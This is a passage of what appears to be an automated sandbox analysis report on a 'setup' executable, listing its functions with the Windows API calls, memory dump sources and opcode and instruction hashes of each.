                                                                                                                          • Opcode Fuzzy Hash: 218b330aca39a16d250edaba0abfb3c86649173d090403c2a4b6e4a843062e72
                                                                                                                          • Instruction Fuzzy Hash: 73E0B870680205FBEB111B61EC0BB6D3E55BB05B95F248421F98DE44F2D7A1EA509684
                                                                                                                          Function 00C8AD2D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetConsoleOutputCP.KERNEL32(4641B5ED,00000000,00000000,?), ref: 00C8AD90
                                                                                                                            • Part of subcall function 00C87374: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8ABB5,?,00000000,-00000008), ref: 00C873D5
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8AFE2
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C8B028
                                                                                                                          • GetLastError.KERNEL32 ref: 00C8B0CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2112829910-0
                                                                                                                          • Opcode ID: f41b411ea3f5df0affa798b555e2ae9aac827a41330d9ff17533c64ef203c30c
                                                                                                                          • Instruction ID: 6673a651560c78bb0501cc1cec08e53a4a12a6d3f58ff408e449cf3b4339a366
                                                                                                                          • Opcode Fuzzy Hash: f41b411ea3f5df0affa798b555e2ae9aac827a41330d9ff17533c64ef203c30c
                                                                                                                          • Instruction Fuzzy Hash: 23D19CB5D002489FDF15DFA8C880AAEBBB5FF09318F28456AE426EB351D730AD41CB54
                                                                                                                          Function 00C020D4 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,00000000,00000000), ref: 00C020FA
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 00C0210C
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C02164
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C0216F
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C0217A
                                                                                                                            • Part of subcall function 00C01ED5: SetLastError.KERNEL32(0000007E,?,?,?,?,74DEFFC0,00000000), ref: 00C01F33
                                                                                                                            • Part of subcall function 00C01ED5: GetLastError.KERNEL32(?,?,?,?,74DEFFC0,00000000), ref: 00C01F60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3862222148-0
                                                                                                                          • Opcode ID: 5261696ce1911d7e8559c329c4ebedaf37ea1724fbebf145535b7c5aff5d0687
                                                                                                                          • Instruction ID: c15b4277e3c3a05d795700e966b33066a1438053fa4afbf8ecdb3ca876d61f72
                                                                                                                          • Opcode Fuzzy Hash: 5261696ce1911d7e8559c329c4ebedaf37ea1724fbebf145535b7c5aff5d0687
                                                                                                                          • Instruction Fuzzy Hash: 37215E30A00209EBDF159BA5DC49BAEBB79BF44344F044066EA25921D0DB719E45DB90
                                                                                                                          Function 00C25AAD Relevance: 6.3, APIs: 4, Instructions: 317COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C25AB7
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C25C46
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C25CB4
                                                                                                                          • GetCharABCWidthsW.GDI32(?,00000000,000000FF,?), ref: 00C25D04
                                                                                                                            • Part of subcall function 00C26446: __EH_prolog3_GS.LIBCMT ref: 00C2644D
                                                                                                                            • Part of subcall function 00C25A48: GetCharABCWidthsW.GDI32(?,?,?,?), ref: 00C25A8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharCreateFontH_prolog3_IndirectWidths
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1348433551-0
                                                                                                                          • Opcode ID: cdae4f4d440cb89899c9da56045e3104316faaa92c852986d39ad6fb8e78c163
                                                                                                                          • Instruction ID: 2d4cfb0887a415b0bbca89574594e25e704724189cb2f90bdc0ace0c39ed78cc
                                                                                                                          • Opcode Fuzzy Hash: cdae4f4d440cb89899c9da56045e3104316faaa92c852986d39ad6fb8e78c163
                                                                                                                          • Instruction Fuzzy Hash: 65E1DA70A001298FDF68DF28D994FD9B7B5BF49300F1446EAE809AB656DB305E85CF50
                                                                                                                          Function 00C42F0F Relevance: 6.1, APIs: 4, Instructions: 144registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C42F19
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC2A
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC39
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C4309E
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C430B1
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C4310B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$EnumH_prolog3_Value
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 431837299-0
                                                                                                                          • Opcode ID: 5b8334902df294bfe80d7e9a002038688141d33e6b799c318b60b293460eef48
                                                                                                                          • Instruction ID: 29b40942680557471e707a687f2cfe752266dcbae7760303a00ec9133694deae
                                                                                                                          • Opcode Fuzzy Hash: 5b8334902df294bfe80d7e9a002038688141d33e6b799c318b60b293460eef48
                                                                                                                          • Instruction Fuzzy Hash: D4510CB1A001289BCB21DB54CC89ADEBBBCFF48714F4041DAF609A7251DA705F85DFA8
                                                                                                                          Function 00C7A7DD Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1783f6c642929a4854fd8e7953672e434b77d5f7384fcf0e99eb56a4611544f0
                                                                                                                          • Instruction ID: 474a295af393dba4b672a25cf160d79fafbd6b2a8b9fefe7c31956c6dfa937d4
                                                                                                                          • Opcode Fuzzy Hash: 1783f6c642929a4854fd8e7953672e434b77d5f7384fcf0e99eb56a4611544f0
                                                                                                                          • Instruction Fuzzy Hash: 7F41C672A00304AFE7149F79CC41B6EBBA9FBC8710F10C62AF119DB2D1D7719A519782
                                                                                                                          Function 00C3ADE7 Relevance: 6.1, APIs: 4, Instructions: 117registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,00CAE150,?,00001000,?), ref: 00C3AF34
                                                                                                                            • Part of subcall function 00C3AF66: RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C3AD94,?,00000000), ref: 00C3AFAB
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,00000000,4641B5ED,?,?,?,?,00C94D63,000000FF), ref: 00C3AE82
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,00C94D63,000000FF), ref: 00C3AEBE
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C94D63,000000FF), ref: 00C3AED8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue$PrivateProfileString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2114517702-0
                                                                                                                          • Opcode ID: 17fea3c3813d3e534f2aa3c6ff8137f57d4bf5b30e46ced8e6fec50ed86a2a61
                                                                                                                          • Instruction ID: dde84bb0c9c801e82ac04907e4550f75e1b7f3fee9b45a230a2f728aba4b7bb7
                                                                                                                          • Opcode Fuzzy Hash: 17fea3c3813d3e534f2aa3c6ff8137f57d4bf5b30e46ced8e6fec50ed86a2a61
                                                                                                                          • Instruction Fuzzy Hash: F0418271900229EFDB25DF54CC49EAEB7B8EF08310F1041AAF515A3282DB309E55EFA1
                                                                                                                          Function 00C0FB2B Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C0FB32
                                                                                                                            • Part of subcall function 00C08836: __EH_prolog3.LIBCMT ref: 00C0883D
                                                                                                                            • Part of subcall function 00C08836: InitializeCriticalSection.KERNEL32(?,00000004), ref: 00C08848
                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00C0FC0B
                                                                                                                          • SystemParametersInfoW.USER32(00000068,00000000,?,00000000), ref: 00C0FC7D
                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00C0FCA9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalH_prolog3InitializeSection$CursorInfoLoadParametersSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3061984961-0
                                                                                                                          • Opcode ID: 82076de04612788b5b6ba46c6509cf8bb5776868f97cab7757ae63ae08b2b6f2
                                                                                                                          • Instruction ID: 0d7b8eab72914c78253c227f7f9fb178815a7e31c5eb3d78bf6743437e4d0c67
                                                                                                                          • Opcode Fuzzy Hash: 82076de04612788b5b6ba46c6509cf8bb5776868f97cab7757ae63ae08b2b6f2
                                                                                                                          • Instruction Fuzzy Hash: 5B5127B0A00B56EFC708CF69C888BD9FBB0BF19304F50862ED56C9B241D7B16255DB94
                                                                                                                          Function 00C14D61 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C14D68
                                                                                                                            • Part of subcall function 00C2CF8A: __EH_prolog3.LIBCMT ref: 00C2CF91
                                                                                                                            • Part of subcall function 00C2CF8A: GetDC.USER32(00000000), ref: 00C2CFBD
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D822
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D838
                                                                                                                          • lstrlenA.KERNEL32 ref: 00C14DDC
                                                                                                                          • lstrlenA.KERNEL32(?,?), ref: 00C14DEF
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,00000001,00000001,?), ref: 00C14E38
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSelectlstrlen$ExtentH_prolog3H_prolog3_TabbedText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3717232549-0
                                                                                                                          • Opcode ID: 45a1711835bd232b7e40e9832385f401f8ca3ef622b8a2ba13862f5ce0b65f02
                                                                                                                          • Instruction ID: 5f3c4d97a4d9d52357fdf0b99d74dabd22ae0b5188cf303d67246dea4ee933d3
                                                                                                                          • Opcode Fuzzy Hash: 45a1711835bd232b7e40e9832385f401f8ca3ef622b8a2ba13862f5ce0b65f02
                                                                                                                          • Instruction Fuzzy Hash: 49415871D00129AFCF08EFA8D891AEDBBB5FF19310F048129E416BB255DB30AD51DBA0
                                                                                                                          Function 00C23A12 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000007,000006CC,00C15FDD,?), ref: 00C23A86
                                                                                                                            • Part of subcall function 00C23B61: NetServerGetInfo.NETAPI32(?,00000064,?,?,00000000), ref: 00C23BA3
                                                                                                                            • Part of subcall function 00C23B61: NetApiBufferFree.NETAPI32(?,?,00000000), ref: 00C23BB9
                                                                                                                            • Part of subcall function 00C23B61: WNetAddConnection3W.MPR(00000000,?,00000000,00000000,00000008), ref: 00C23C0F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BufferConnection3ErrorFreeInfoLastServer
                                                                                                                          • String ID: Update.scp$\\?\$\\?\UNC\
                                                                                                                          • API String ID: 75736065-795958587
                                                                                                                          • Opcode ID: c112c01f44742aa318a2f6398fa37cfcfdb209eaf4f7815d29d9ee43cbf460a2
                                                                                                                          • Instruction ID: 8213e48c4ca4870206303f45b53531de531024f84b6ba429b4a6919f4ade9dbb
                                                                                                                          • Opcode Fuzzy Hash: c112c01f44742aa318a2f6398fa37cfcfdb209eaf4f7815d29d9ee43cbf460a2
                                                                                                                          • Instruction Fuzzy Hash: A831EB32900364A6DA24AEB46C4BFAF73A89F01710F20496AF319D75C2DA78DB44E674
                                                                                                                          Function 00C1143E Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C11445
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C11468
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C11480
                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C114B8
                                                                                                                            • Part of subcall function 00C0E8D1: CreateSolidBrush.GDI32(?), ref: 00C0E905
                                                                                                                            • Part of subcall function 00C0E8D1: FillRect.USER32(?,?,00000000), ref: 00C0E936
                                                                                                                            • Part of subcall function 00C0E8D1: DeleteObject.GDI32(00000000), ref: 00C0E93D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Create$CompatibleRect$BeginBitmapBrushClientDeleteFillH_prolog3H_prolog3_ObjectPaintSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 931016122-0
                                                                                                                          • Opcode ID: 10a50fe3a5bb43140f64504f5907a44fa16cbfa9279f465154057cf71158585a
                                                                                                                          • Instruction ID: 7141daaa58bb61cd4b2e11c7bd6a75f23b02d0933bed6c8c2a74600d62f13381
                                                                                                                          • Opcode Fuzzy Hash: 10a50fe3a5bb43140f64504f5907a44fa16cbfa9279f465154057cf71158585a
                                                                                                                          • Instruction Fuzzy Hash: 71418E729001289BCB14FBB8CD95AFDBB36FF96300F044258EA0367556DB356E54EBA0
                                                                                                                          Function 00C30A29 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C30A91
                                                                                                                          • IsMenu.USER32(00000000), ref: 00C30ACD
                                                                                                                          • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 00C30AE5
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C30B2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3435883281-0
                                                                                                                          • Opcode ID: d36fe25aa9f51b623381bd986f9c83ed312f10c243378285dbf312eb715454eb
                                                                                                                          • Instruction ID: 029e7598f22d8bd3dbf0544ae0594313a204f497e231c19be97832b42f16f73c
                                                                                                                          • Opcode Fuzzy Hash: d36fe25aa9f51b623381bd986f9c83ed312f10c243378285dbf312eb715454eb
                                                                                                                          • Instruction Fuzzy Hash: AB316132A10209AFDB14EBA5C999FBEBBB9EF58314F144159F901A7251DB30AE40DB90
                                                                                                                          Function 00C3619A Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C361A1
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C361F1
                                                                                                                          • GetParent.USER32(?), ref: 00C3623B
                                                                                                                          • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00C36261
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeH_prolog3MessageParentSendTask
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4225250527-0
                                                                                                                          • Opcode ID: 94cf5acc4b2e38d56aeee93c44375e24373358ca650ce818c084202ecee59f2e
                                                                                                                          • Instruction ID: e5ac44d356df4c8f012ee37cbfc96b77c224fbe71425f7ab478047978a7266c8
                                                                                                                          • Opcode Fuzzy Hash: 94cf5acc4b2e38d56aeee93c44375e24373358ca650ce818c084202ecee59f2e
                                                                                                                          • Instruction Fuzzy Hash: B2318F31A00216EFCF04EFA8CC95AAEB774BF04324F118619F565A72E1DF31AA15DB94
                                                                                                                          Function 00C08DCB Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,00C08A39,?,?,?,00000000), ref: 00C08DF8
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C08E11
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C08E1A
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C08E25
